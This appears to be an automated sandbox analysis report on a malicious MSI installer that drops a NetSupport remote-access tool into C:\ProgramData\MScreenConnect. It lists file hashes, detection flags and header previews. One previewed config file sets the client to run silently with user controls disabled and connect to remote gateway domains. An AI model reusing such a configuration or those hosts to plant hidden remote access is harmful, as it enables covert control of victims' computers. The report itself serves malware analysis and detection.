Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=Jc.y+..y+..y+..pS..w+..m@..x+..m@..i+..y+.._+..m@..z+..m@..z+..m@..x+..m@..{+..m@..x+..m@..x+..Richy+..........PE..L....((.........."!................. .......0...............................p............@A........................0)..i....@.......P..(................"...`......0...T........................... ................@...............................text............................... ..`.data...L....0......................@....idata..`....@....... ..............@..@.rsrc...(....P.......&..............@..@.reloc.......`.......,..............@..B........................................................................................................................................................................................................................................................................................................................

C:\ProgramData\MScreenConnect\appverifUI.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	112240
Entropy (8bit):	6.395200256959712
Encrypted:	false
SSDEEP:	1536:K+RGvUq3pIr/E2S329ffBuEiVBPmWxmLhiFBziC:K+R/qCI33+fBiVBPmamV+Bh
MD5:	E1FA08FF0442CD5078EDF69C208CCFAC
SHA1:	F2BDFAF9A7878CE8337AA12AE74F9A65AA104DEF
SHA-256:	5409E308DC9DB90CC693AAD3AA0666923128F5C2BDF4077450B149D5E443159D
SHA-512:	DCAF0BA27F21DD7BD3C08CCB22213414B09B365B63E87C7111EE314342F408374A91A15008393AC4D6045A4FE6BAA51D6619D58C7267E5C588B8D9956C193CC5
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+)6}oHX.oHX.oHX.$0[/lHX.oHY..HX.$0Y/pHX.$0]/eHX.$0\/~HX.$0X/nHX.$0P/fHX.$0..nHX.$0Z/nHX.RichoHX.................PE..L......P...........!.....,...x...............@...........................................@A........................p;..f...Tc..@........3..............p&..........\|4..T...........................P...@............`..L............................text....+.......,.................. ..`.data........@.......0..............@....idata.......`.......2..............@..@.rsrc....3.......4...J..............@..@.reloc...............~..............@..B........................................................................................................................................................................................................................................................................................................................

C:\ProgramData\MScreenConnect\client32.exe

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	107376
Entropy (8bit):	4.702402773520006
Encrypted:	false
SSDEEP:	384:rmXhuZ758V5+6j6Qa86Fkv2Wr120hZD4otVVtV6is:iEd8VZl6FhWr80/sotVVtV6is
MD5:	F6ABEF857450C97EA74CD8F0EB9A8C0A
SHA1:	A1ACDD10F5A8F8B086E293C6A60C53630AD319FB
SHA-256:	DB0ACB4A3082EDC19CA9A78B059258EA36B4BE16EEE4F1172115FC83E693A903
SHA-512:	B6A2196EBFA51BB3FB8FB2B95AD5275828AB5435FD859FC993E2B3ED92A74799FE1C8B178270F99C79432F39AA9DBC0090038F037FCB651AB75C14B18102671F
Malicious:	true
Yara Hits:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\MScreenConnect\client32.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 12%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9!..}@.}@.}@.t8E..@....~@.}@.x@....\|@...).\|@....\|@.Rich}@.........................PE..L......Y.....................t...... ........ ....@..................................[....@..................................!..<....0...l...........z..p).......... ..T............................................ .. ............................text............................... ..`.rdata....... ......................@..@.rsrc....l...0...n..................@..@.reloc...............x..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\MScreenConnect\client32.ini

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	664
Entropy (8bit):	5.426079899627146
Encrypted:	false
SSDEEP:	12:l7hqH+WX4Ba/vmZ7CVVePb2oGS+u8on4ekLvaCYubluGjI9vykBIYPGY:l7hqeV8uT/yrneruEvykBIKf
MD5:	14F6EBED5E1176F17C18D00A2DC64B2E
SHA1:	CB9C079373658CE098E1D07D4A2C997BF3141B4B
SHA-256:	D4C1F00382F01ABBB3142EF6D9C3E51557D0CED12A52861D8C5DF44D1CE723AC
SHA-512:	E5F24A695749D693E873EA60B8CAAFF5CB3B306887721E3F9F308AFE697FBA37F3A6226322AEDEBB46764D6BBBAF21DF44D4C6A02DB49B067437D7E7D0CCEAF9
Malicious:	false
Preview:	0xe77314c8....[Client].._present=1..DisableChatMenu=1..DisableDisconnect=1..DisableReplayMenu=1..DisableRequestHelp=1..SOS_RShift=0..DisableChat=1..Shared=1..ValidAddresses.TCP=..silent=1..AlwaysOnTop=0..SOS_Alt=0..SysTray=0..UnloadMirrorOnDisconnect=0..AutoICFConfig=1..DisableMessage=1..SOS_LShift=0..Usernames=..SecurityKey2=dgAAANFUHNynybuwpE8GRawoAgMA..Protocols=3....[_License]..quiet=1....[_Info]..Filename=C:\ProgramData\regid1996-09com.microsoft\client32-u.ini....[General]..BeepUsingSpeaker=0....[HTTP]..CMPI=60..GatewayAddress=armayalitim.com:443..GSK=HA;F?FCFHL>BBCEEHH:I<J?LED..Port=443..SecondaryGateway=armayalitim1722.com:443..SecondaryPort=443..

C:\ProgramData\MScreenConnect\dpnathlp.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	4.3358588850360205
Encrypted:	false
SSDEEP:	96:ixLCTNklk4a+4a9Tcqn2jshq8PjAzIsEWRuWw1QR:ixmT4kJ+4Yu0PrAzKWRuW
MD5:	FAEDA9B43E022ACD3B8462B222EEDC72
SHA1:	9D81571936C9270600E54F7BCA210026F6ECD830
SHA-256:	F0F847A5079F94ADFD5B224C05DDD4A5651C757B920B6C26E629993C7DD36951
SHA-512:	5A351F6A59F148E7091B8EFFA5D5E59102AB4FC4BFC1374E19A8ADE57FC68BCE4467F5B9BE34F9A4AAF2DF85721EFBCCDE064803469FEBA2B06EA789681B0D4E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d"...L...L...L..nO...L..nH...L...M...L..nM...L..nL...L..nE...L..n....L..nN...L.Rich..L.................PE..L...p..............!......................... ...............................`.......y....@A........................ ...C...L0..<....@.......................P..........T............................................0..H............................text...c........................... ..`.data...L.... ......................@....idata.......0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\MScreenConnect\dpnhupnp.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	4.3358588850360205
Encrypted:	false
SSDEEP:	96:ixLCTNklk4a+4a9Tcqn2jshq8PjAzIsEWRuWw1QR:ixmT4kJ+4Yu0PrAzKWRuW
MD5:	FAEDA9B43E022ACD3B8462B222EEDC72
SHA1:	9D81571936C9270600E54F7BCA210026F6ECD830
SHA-256:	F0F847A5079F94ADFD5B224C05DDD4A5651C757B920B6C26E629993C7DD36951
SHA-512:	5A351F6A59F148E7091B8EFFA5D5E59102AB4FC4BFC1374E19A8ADE57FC68BCE4467F5B9BE34F9A4AAF2DF85721EFBCCDE064803469FEBA2B06EA789681B0D4E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d"...L...L...L..nO...L..nH...L...M...L..nM...L..nL...L..nE...L..n....L..nN...L.Rich..L.................PE..L...p..............!......................... ...............................`.......y....@A........................ ...C...L0..<....@.......................P..........T............................................0..H............................text...c........................... ..`.data...L.... ......................@....idata.......0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\MScreenConnect\dpnlobby.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	4.3358588850360205
Encrypted:	false
SSDEEP:	96:ixLCTNklk4a+4a9Tcqn2jshq8PjAzIsEWRuWw1QR:ixmT4kJ+4Yu0PrAzKWRuW
MD5:	FAEDA9B43E022ACD3B8462B222EEDC72
SHA1:	9D81571936C9270600E54F7BCA210026F6ECD830
SHA-256:	F0F847A5079F94ADFD5B224C05DDD4A5651C757B920B6C26E629993C7DD36951
SHA-512:	5A351F6A59F148E7091B8EFFA5D5E59102AB4FC4BFC1374E19A8ADE57FC68BCE4467F5B9BE34F9A4AAF2DF85721EFBCCDE064803469FEBA2B06EA789681B0D4E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d"...L...L...L..nO...L..nH...L...M...L..nM...L..nL...L..nE...L..n....L..nN...L.Rich..L.................PE..L...p..............!......................... ...............................`.......y....@A........................ ...C...L0..<....@.......................P..........T............................................0..H............................text...c........................... ..`.data...L.... ......................@....idata.......0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\MScreenConnect\dxmasf.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5632
Entropy (8bit):	2.6257057833605213
Encrypted:	false
SSDEEP:	48:CLMizve6wUDFgPhIhvsG1eMbotAQqnAwpgS008IZW0H1lXnuIzh/o5WwHgK:4MizvlNDF+MktAXAwoXEWs/n3/sWwr
MD5:	77686C7F73FA932D89BF262002182FD1
SHA1:	95D2B97C00B26A3D327ABA83F5CDF4459736AF87
SHA-256:	BAA1A9D6338CB995A341A18D6003049EC4E14C7588DD8F78D0CEED324301163E
SHA-512:	5BFD67B0DED3FE9967468F69AB2790A2F475D330E8DC4EA8CDE5BE47CC2433A22F48DB547724443130A969F2370BD5A0CC9A602894B340E0899C319DEA6B7376
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%..a...a...a...u...b...a...j...u...g...u...`...u...`...u.s.`...u...`...Richa...........................PE..L..................!......................... ...............................`............@E................................ 0..(....@.......................P..,.......T............................................0...............................text...5........................... ..`.data...$.... ......................@....idata.......0......................@..@.rsrc........@......................@..@.reloc..,....P......................@..B................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\MScreenConnect\getuname.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	8704
Entropy (8bit):	4.810621720665765
Encrypted:	false
SSDEEP:	96:9MSvZiG2+XZ9PIzWIY+0y1/wbaDQzf7qfBS9nFJEcMYZcEWIdWwWZ2f:PfJsW7+0AHGfWfBqn7Ec3ZtWIdWH0
MD5:	8881F8445B35C24DC307561809E15A4A
SHA1:	1B76C7657AAEAAC45D39B837E2131B5B4113F599
SHA-256:	0CBEB415A66083408897C5C8D404BFA2B32132CC49C203969125A106AE2C0520
SHA-512:	3B6C764896F9EA30E1BE38496AAF6F16507034D9AE8D6B87046A9A69197061E56657A1E6FB7A1F57E77E73F93CF962E8F122577AED78FE55D984D37554F176A1
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........K...........;...........................................W..........Rich...........................PE..L....\.............!................`........ .....t.........................`.......t....@A............................H...d0.......@.......................P..4.......T............................................0..`............................text...8........................... ..`.data...P.... ......................@....idata.......0......................@..@.rsrc........@......................@..@.reloc..4....P....... ..............@..B................................................................................................................................................................................................................................................................................................................

C:\ProgramData\MScreenConnect\icmp.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2560
Entropy (8bit):	3.5862620294630116
Encrypted:	false
SSDEEP:	24:eH1GS3cwXqQnWI2rxDWlJZfWgd/bWuJ0Sto6IZW0gTXNu/2SY35WWdPPYPNy:yDXqQnWtDSd/SOtFIZW39u1m5WwHg
MD5:	EF7D0F1EF60616814125B2FEDD84B0EB
SHA1:	090E43A171926FD20F7C8DA4AC71473E70A44337
SHA-256:	7CF9EEBBA0742BDCCE8763E80FC6E8C724B7FF0B5B2084E757666BFF6397C779
SHA-512:	F8D372C2E574DB8E812DDE924B6391581233E6BDCB2CD4486A0CFD790E76DFD1C711837A9BADDDA9A58B68AC94A028C4166F211AB7F4D46C56152050D6C12393
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........=..S...S...S...S...S......S...Q...S.Rich..S.........PE..L..... ............!..............................@S.........................0.......6....@E........................`................ ..................................T............................................................................text...............................@..@.rsrc........ ......................@..@...... .........!................. .........d...0...0......... .........$............................. .........................................B...j...........................1.......\...............................icmp.dll.IcmpCloseHandle.iphlpapi.IcmpCloseHandle.IcmpCreateFile.iphlpapi.IcmpCreateFile.IcmpParseReplies.iphlpapi.IcmpParseReplies.IcmpSendEcho2.iphlpapi.IcmpSendEcho2.IcmpSendEcho.iphlpapi.IcmpSendEcho.do_echo_rep.iphlpapi.do_echo_rep.do_echo_req.iphlpapi.do_echo_req.re

C:\ProgramData\MScreenConnect\ir41_qcx.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	8704
Entropy (8bit):	4.790309421557943
Encrypted:	false
SSDEEP:	96:APT8Qw74DEmFTkqZn+2j8FWLqZW95OQbfzDzJEczJDlEWBSWwSULY9K:AW7qEcNIEyQ5OQbfPNEczx+WBSWKf
MD5:	B4B0B3EAB11FFEFD388FC4C3184E85EC
SHA1:	422F096EBC004BD72F3E4BD83E9B8E77E44F90F2
SHA-256:	E9C8544CECBA0B9A5D9D181F5FC87763A5164DA6E60F290AD4AD49DFC466EB06
SHA-512:	06FA240220CB92C9165B2C24A21763C5DC0471AEC3662FF3E56525F3CCF70B347D4F12EACF9D667302FA8956A868DD764A97330FC155AB0B664DC01A8C5C0316
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........V.\|...\|...\|....N..\|.......\|.......\|...\|...\|.......\|.......\|.......\|...."..\|.......\|..Rich.\|..................PE..L...E.}4...........!................p........ ...............................`............@A................................t0.......@.......................P..,...0...T............................................0..p............................text............................... ..`.data...P.... ......................@....idata..(....0......................@..@.rsrc........@......................@..@.reloc..,....P....... ..............@..B........................................................................................................................................................................................................................................................................................................................

C:\ProgramData\MScreenConnect\ir50_32.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	9216
Entropy (8bit):	4.813302544949798
Encrypted:	false
SSDEEP:	192:AQ4SQSd9hCFA+QABxo6tQABrEczxmWQRWS:cxSDhCe+QABxo6BxmWQRW
MD5:	A5AF6933A1EE4FCF41EE5EC75879B479
SHA1:	BE65C18CCDB50CF622D3A8585B5899DDDCD75531
SHA-256:	E83861E331E90F2A41CD749E33614FB61595C1B9E29D9808B8DD68CC38968C47
SHA-512:	CB6A257EBC10A193E9C75191E2F009C53054CF985ED04A9F3A75D21D9EFD709C015BC80A217740164ED978FD31FDF5DCA44C9E5D4287AE40791990E165BA839B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........\B.=,..=,..=,..E...=,..V/..=,..V(..=,..=-..=,..V-..=,..V,..=,..V%..=,..V..=,..V...=,.Rich.=,.........PE..L..................!.........................0...............................p.......5....@A........................@.......x@.......P.......................`..l.......T............................................@..t............................text............................... ..`.data...p....0......................@....idata..>....@......................@..@.rsrc........P......................@..@.reloc..l....`......."..............@..B................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\MScreenConnect\msvcp140_codecvt_ids.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18832
Entropy (8bit):	6.4434700117269585
Encrypted:	false
SSDEEP:	384:tKDL6r3uJBAjEOTWikEWEZ1e14gHRN7NslXFTnh:Aa3urdT8GNmt
MD5:	0AB5BACD140CB2A1014A2EF49E56A770
SHA1:	CE60ADF0EF64B3C0B69F4EC69A7BEA855E448D57
SHA-256:	DE699589DB52A7E952B3F2DF186E346B1A68E7AD9F6DC38C390D4A1CEB99FEAC
SHA-512:	025B5301320000DCB09EECB4D0B20CC0F991121A4CCC911A88BDE4D83387FC995A84FE7B7E88907A38AEFA9B35B67C29390220743DC193CD938C45D6F798B390
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........mm[............v~.......t..............uz......uz......uz......uz......uz......uz......uz......Rich............PE..L....L.`.........."!.........................0...............................p............@A........................0"../...p@..P....P..0............&...#...`..L...D...8...............................@............@..h............................text..._........................... ..`.data........0......................@....idata..x....@......................@..@.rsrc...0....P......................@..@.reloc..L....`.......$..............@..B........................................................................................................................................................................................................................................................................................................................

C:\ProgramData\MScreenConnect\msvcr100.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	773968
Entropy (8bit):	6.901559811406837
Encrypted:	false
SSDEEP:	12288:nMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BVoe3z:MmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV7z
MD5:	0E37FBFA79D349D672456923EC5FBBE3
SHA1:	4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
SHA-256:	8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
SHA-512:	2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L......M.........."!.........................0.....x......................................@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\MScreenConnect\msvcr100_clr0400.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18920
Entropy (8bit):	7.192716546151935
Encrypted:	false
SSDEEP:	384:iWyH/WgRCQpBj0HRN7da7YQHRN7MWk9flxIphg:c+qWdiY8M/AO
MD5:	39DB58D4965874979F0D45FBB96CA675
SHA1:	AFFFBD2B3DF2D14C19D5E675326658AB6DA9C3CB
SHA-256:	0EC970064D98B5825D78E5CC5CDA6919CE88DAD1D121E8E556872B815A84A497
SHA-512:	34CEEE6503BDF83989AF8F7CC15C513455D13BD1495748B339BC165556116F7B54AA6FBF4505B93E721056B02EF1F8B914EDE91928CDAE4B77866927190D62B0
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u.<.1.R.1.R.1.R....0.R...P.0.R.Rich1.R.........PE..L....<.].........."!.........................................................0......<.....@.......................................... ...................A...........................................................................................text...p...........................@..@.rsrc........ ......................@..@.............<.]........T........................rdata......T....rdata$zzzdbg.... ..`....rsrc$01....` .......rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\MScreenConnect\nskbfltr.inf

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Windows setup INFormation
Category:	dropped
Size (bytes):	328
Entropy (8bit):	4.93007757242403
Encrypted:	false
SSDEEP:	6:a0S880EeLL6sWqYFcf8KYFEAy1JoHBIr2M2OIAXFYJKRLIkg/LH2yi9vyifjBLWh:JShNvPG1JoHBx2XFhILH4Burn
MD5:	26E28C01461F7E65C402BDF09923D435
SHA1:	1D9B5CFCC30436112A7E31D5E4624F52E845C573
SHA-256:	D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
SHA-512:	C30EC66FECB0A41E91A31804BE3A8B6047FC3789306ADC106C723B3E5B166127766670C7DA38D77D3694D99A8CDDB26BC266EE21DBA60A148CDF4D6EE10D27D7
Malicious:	false
Preview:	; nskbfltr.inf..;..; NS Keyboard Filter..; ..;..; This inf file installs the WDF Framework binaries....[Version]..Signature="$Windows NT$"..Provider=NSL......;..;--- nskbfltr Coinstaller installation ------..;......[nskbfltr.NT.Wdf]..KmdfService = nskbfltr, nskbfltr_wdfsect....[nskbfltr_wdfsect]..KmdfLibraryVersion = 1.5......

C:\ProgramData\MScreenConnect\nsm_vpro.ini

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	46
Entropy (8bit):	4.532048032699691
Encrypted:	false
SSDEEP:	3:lsylULyJGI6csM:+ocyJGIPsM
MD5:	3BE27483FDCDBF9EBAE93234785235E3
SHA1:	360B61FE19CDC1AFB2B34D8C25D8B88A4C843A82
SHA-256:	4BFA4C00414660BA44BDDDE5216A7F28AECCAA9E2D42DF4BBFF66DB57C60522B
SHA-512:	EDBE8CF1CBC5FED80FEDF963ADE44E08052B19C064E8BCA66FA0FE1B332141FBE175B8B727F8F56978D1584BAAF27D331947C0B3593AAFF5632756199DC470E5
Malicious:	false
Preview:	[COMMON]..Storage_Enabled=0..Debug_Level=0....

C:\ProgramData\MScreenConnect\pcicapi.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	45112
Entropy (8bit):	6.86518195777479
Encrypted:	false
SSDEEP:	768:3o6OZSOe0iI6IdE+OPCH4mf6u0Qn+6wwbiRGp9E+yhwBkbp9E+8iROr:3o6mSOqIqPCYmfRnlwwbioQ+yhwBkbQ1
MD5:	9DAA86D91A18131D5CAF49D14FB8B6F2
SHA1:	6B2F7CEB6157909E114A2B05A48A1A2606B5CAF1
SHA-256:	1716640CCE74322F7EE3E3E02B75CD53B91686F66E389D606DAB01BD9F88C557
SHA-512:	9A98E0D9E2DDA8AEFA54BDDB3C7B71501D638DFF68863939DE6CAA117B0E7BF15E581A75419EF8A0DA3F1C56A19F1B0F4C86D65F8581773AB88FF5764B9BB3AA
Malicious:	true
Yara Hits:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\MScreenConnect\pcicapi.dll, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........~....Z...Z...Z...Z...Z...Z...Z...Z...Z...Z..Z...Z...Z...Z...Z...Z...Z...Z...Z...Z...Z...Z...ZRich...Z................PE..L......^...........!.....6...........@.......P............................................@.........................`c.......[..d.......x............d..8L..........pQ...............................Z..@............P..X............................text...~5.......6.................. ..`.rdata.._....P.......:..............@..@.data....r...p.......P..............@....rsrc...x............R..............@..@.reloc...............Z..............@..B................................................................................................................................................................................................................................................................................................................

C:\ProgramData\MScreenConnect\remcmdstub.exe

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	69744
Entropy (8bit):	6.597732994360204
Encrypted:	false
SSDEEP:	1536:rfanvXuNOwphKuyUHTqYXHhrXH4xLIygAormAWXiJ:LanPSpAFUzt0xLIygtgk
MD5:	A67623B4D8C86858115BEE9278B7A742
SHA1:	58BF04265A09EC5E3483CCBC459241C67E928FC7
SHA-256:	B0177CFB8F4D5DFB5C3EC3181CDDABA157771921C1F26C17AED736A605153A0B
SHA-512:	BA1F1FBCB32349DB90C90FF28DB5F7B74452A0629882531222383A5A4ADBF62C31B181B49729C0A1CD971F0C39C6EC33CFE4912C25FBA7430437C7D6F71A9056
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g.V#...#...#...L...2...*.r.&...#...t...L.K.u...L.J.>...L.{."...L.\|."...Rich#...........PE..L......^.....................J.......!............@.......................... ......9?....@....................................<.......T...............p@..............................................@...............@............................text.............................. ..`.rdata..,%.......&..................@..@.data....-..........................@....rsrc...T...........................@..@.reloc..p...........................@..B................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\MScreenConnect\vfcompat.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	66216
Entropy (8bit):	6.433452174292797
Encrypted:	false
SSDEEP:	1536:Cjd9OvJ5PoXlmxKwVekLrNf9u3mIBDjzGEH:CjyYnqJV9u3mSjKk
MD5:	9CA60DDC3EB7E60B5492BAE9C105C432
SHA1:	2540989BD56427AC864C3CD7417C63B37D172822
SHA-256:	316CE89C9A473D758C1C17AADEB22F3976D2E8DDA0EFA07899311273E43B7CB8
SHA-512:	9B32D9E150E4000AA374A0ED934C60ECC8CDC17E29E77888DC270E24DD0BDACCDA88B3C87E79191AC2DA2F3E39E9782491024C4370160E9AEBB4A36B40C7C284
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........g...........................................................................Rich....................PE..L.................!.........>.......,....................................................@A............................3...4...d........................(...........'..T...............................@...............(............................text...3........................... ..`.data...`...........................@....idata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................

C:\ProgramData\MScreenConnect\wfapigp.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18944
Entropy (8bit):	5.4541836410295055
Encrypted:	false
SSDEEP:	384:pYTd+1A0ELfG1rS9pjsj3CMC901pvW4vWaO:pG+eaA9pjwClIpDu
MD5:	FD9AFC7DD89A1D07E0CB0F446AD6276F
SHA1:	C62574724F42FEA392D787E0D43FD7C6EE0D29AF
SHA-256:	23FDD21121E75766DB8CA077494C4E74F24EB38A19796739BD0CD39584AF2208
SHA-512:	FD968E3E4771D0F5B80734D58A1DD858703CF0400607A03493423E8C84A0DC0A6FC687D4B5F526F257C6714955374BB96EFCF0DB0D7D95AF6A2A48A3D0B9E06A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z.."Z...Z..[...Z..[...Z..[...Z...Z...Z..[...Z..[...Z..NZ...Z..[...ZRich...Z........................PE..L...I{~{...........!.....0..........@........@.......................................#....@A.........................?..4....P..,....p.. ...............................T............................................P......<<.......................text...4/.......0.................. ..`.data........@.......4..............@....idata..b....P.......6..............@..@.didat..`....`.......>..............@....rsrc... ....p.......@..............@..@.reloc...............F..............@..B........................................................................................................................................................................................................................................................................

C:\ProgramData\MScreenConnect\wiatrace.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	15360
Entropy (8bit):	5.677098248633158
Encrypted:	false
SSDEEP:	384:H3wSrclXZn246VWwmKlBKjijHL9h8vWL/W5O:/OXVi3jHLkw
MD5:	3F3AFCDA1212C70FE1DB3DA109B59BE5
SHA1:	E62D28FCC1775B7E26A18B0B5F193C1E6D4B945A
SHA-256:	FEAAADFE81E72FF9E929893219948A0CD9209681D217B341C3ACCC39870B3491
SHA-512:	1B542EC59D4E46D2A6DD78DD854027DE82C1F145BA69D4E1416AE37F49A038D61217C8F62403615FA54FD56FD9A585035B74C2BDF8DE0761880ABEDD71422EF7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............l...l...l...h...l...o...l...m...l...m...l...l...l...b...l.......l...n...l.Rich..l.........PE..L...).F............!................#.......@......................................J.....@A.........................8..?....P..<....`.......................p..P.......T............................................P...............................text...?)......................... ..`.data...`....@......................@....idata.......P.......0..............@..@.rsrc........`.......4..............@..@.reloc..P....p.......8..............@..B........................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\MScreenConnect\winrsmgr.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2048
Entropy (8bit):	3.0070663606830066
Encrypted:	false
SSDEEP:	24:eH1GS+mCdVQM82IZW0HGbNuZbpa135WWdPPYPNy:yc8MFIZWUGhuZ9at5WwHg
MD5:	55502E7D2D056327139999DD9F3E77B6
SHA1:	B45C98C03830800181C67168FBCB44249EFC1D26
SHA-256:	FAA0C0634EB64A22EA8587E82C5F6EBDDFF4DD773483DC3712073323D78A45AD
SHA-512:	2BD0AAF627A08FEC1CD7F587C11E25CEC20CD4A166C94DBC5697C31083D79D3E443AA9E8755EB0AE9BC91620543CAA4E8EC1425B9DD8429712556CFF41B28A99
Malicious:	false
